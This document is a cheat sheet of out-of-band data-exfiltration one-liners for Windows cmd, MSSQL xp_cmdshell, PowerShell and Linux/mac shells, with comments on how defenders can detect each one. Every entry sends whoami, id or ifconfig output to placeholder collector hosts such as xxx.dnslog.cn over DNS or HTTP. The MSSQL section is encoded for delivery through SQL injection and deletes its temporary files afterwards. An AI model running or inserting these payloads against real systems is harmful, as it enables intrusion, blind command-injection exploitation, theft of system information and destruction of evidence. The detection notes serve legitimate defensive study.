1. windows 命令行:
REM Out-of-band exfiltration over DNS. cmd /v turns on delayed expansion, so !MYVAR! and !FINAL!
REM are read when that step executes rather than when the whole line is parsed.
REM Chain: whoami -> temp; certutil -encode base64-encodes it into temp2 (wrapped in BEGIN/END CERTIFICATE
REM lines); findstr /V drops the lines containing CERTIFICATE; set /p reads only the FIRST line of temp3
REM into MYVAR; that value is prefixed to xxx.dnslog.cn (placeholder collector domain) and resolved via nslookup.
REM Defender notes: certutil -encode launched from cmd.exe is a well-known LOLBin pattern worth alerting on;
REM the DNS/resolver logs show a query whose leftmost label is base64 of the whoami output, which is trivially
REM decodable; temp, temp2 and temp3 are left behind in the working directory and are forensic artefacts.
cmd /v /c "whoami > temp && certutil -encode temp temp2 && findstr /L /V "CERTIFICATE" temp2 > temp3 && set /p MYVAR=< temp3 && set FINAL=!MYVAR!.xxx.dnslog.cn && nslookup !FINAL!"
2. mssql:
-- Same certutil/DNS chain, run through xp_cmdshell (the extended procedure must be enabled with sp_configure
-- first, so an audit of sp_configure 'xp_cmdshell' changes catches the precondition).
-- %26%26 is the URL-encoded form of &&: these statements are written to be delivered through a URL-encoded
-- parameter, i.e. a SQL injection context. Doubled "" is the escape for a literal " inside a "-delimited
-- string (NOTE(review): relies on QUOTED_IDENTIFIER OFF -- confirm on the server).
-- Defender notes: cmd.exe spawned as a child of sqlservr.exe, file creation under D:\, and a DNS query from the
-- database host whose first label is base64 of whoami are the observables; the final del statement removes the
-- three files, so object-access/file auditing (not the files themselves) is what preserves the evidence.
exec master..xp_cmdshell "whoami>D:/temp%26%26certutil -encode D:/temp D:/temp2%26%26findstr /L /V ""CERTIFICATE"" D:/temp2>D:/temp3";
-- Second step: reads the first line of D:/temp3 into MYVAR and pings <base64>.xxx.dnslog.cn; the name must be
-- resolved before any echo is sent, so the DNS query is logged even if the ping itself fails.
exec master..xp_cmdshell "cmd /v /c""set /p MYVAR=< D:/temp3 %26%26 set FINAL=!MYVAR!.xxx.dnslog.cn %26%26 ping !FINAL!""";
-- Cleanup of the intermediate files (anti-forensic step).
exec master..xp_cmdshell "del ""D:/temp"" ""D:/temp2"" ""D:/temp3""";
3. windows 通过start外带
REM Exfiltration via a URL launch: for /F captures the first whitespace-delimited token of the whoami output
REM into %X, then start hands the URL to the default handler (typically the browser), so the account name
REM rides in the HTTP path to xx.xx.xx.xx (placeholder collector).
REM Defender notes: a browser/URL handler started by a non-interactive cmd.exe, and an outbound GET to a bare
REM IP with a username in the path, are both visible in process-creation and proxy logs.
REM %X / %i is the interactive-prompt syntax; inside a .bat file these would be %%X / %%i.
for /F %X in ('whoami') do start http://xx.xx.xx.xx:80/%X
REM Splits domain\user on the backslash and keeps token 2 (the user part), then sends one ICMP echo to
REM <user>.xx.dnslog.cn. The name is resolved before any echo goes out, so the DNS query log is the reliable
REM signal regardless of whether ping succeeds.
for /F "delims=\ tokens=2" %i in ('whoami') do ping -n 1 %i.xx.dnslog.cn
4. windows powershell
REM Same token capture, but the value is handed to an inline PowerShell script: the username is
REM base64-encoded and System.Net.WebClient.DownloadString fetches http://xx.xx.xx.xx/<base64>
REM (placeholder collector), i.e. HTTP exfiltration with light obfuscation.
REM Defender notes: powershell.exe spawned by cmd.exe with ToBase64String / New-Object System.Net.WebClient on
REM its command line is captured by process-creation auditing and PowerShell script block logging; on the
REM network side the proxy sees a GET to a bare IP whose path is a base64 blob.
for /F %X in ('whoami') do powershell $a=[System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes('%X'));$b=New-Object System.Net.WebClient;$b.DownloadString('http://xx.xx.xx.xx/'+$a);
5. linux/mac 通过ping
# DNS exfiltration via command substitution: the current username becomes the leftmost label of the
# queried name (xxx.dnslog.cn is a placeholder collector). ping has to resolve the name before sending
# the single echo, so the DNS query reaches the resolver even if no reply ever comes back.
# Defender notes: ping executed by a service account (web server / application user) and DNS queries whose
# labels look like usernames are the signals; this is the classic blind command-injection confirmation.
ping -c 1 $(whoami).xxx.dnslog.cn
6. linux/mac 通过ping+base64
# Same as above with the username base64-encoded; $(...) strips the trailing newline that base64 emits.
# Defender notes: the encoding only hides the literal string -- base64-looking DNS labels are easy to flag
# and decode in resolver logs, and the process-creation signal (ping + base64 from a service account) is unchanged.
ping -c 1 $(whoami|base64).xxx.dnslog.cn
7. linux/mac 通过curl
# HTTP exfiltration with curl (xx.xx.xx.xx / xx.dnslog.cn are placeholder collectors).
# First form puts the value in the URL path: it is visible in the egress proxy log and the collector's web log.
curl http://xx.xx.xx.xx/$(whoami)
# Second form puts the value in the hostname, so it leaks via the DNS lookup even when the outbound HTTP
# connection itself is blocked -- DNS egress filtering/logging is the control that catches this one.
curl http://$(whoami).xx.dnslog.cn
8. linux/mac 通过curl+base64
# curl exfiltration of id / ifconfig output, base64-encoded; path form (web/proxy log) and hostname form (DNS log).
# Defender notes: curl run by a web or application user, base64-looking URL paths or DNS labels, and egress to
# bare IPs are the observables; the encoding is reversible, so logged requests reveal exactly what was leaked.
curl http://xx.xx.xx.xx/$(id|base64)
curl http://$(id|base64).xx.dnslog.cn
# tr '\n' '-' collapses the multi-line base64 output into a single token, otherwise the unquoted $(...) would
# word-split into several curl arguments. Expect one long request whose path decodes to interface config.
curl http://xx.xx.xx.xx/$(ifconfig|base64|tr '\n' '-')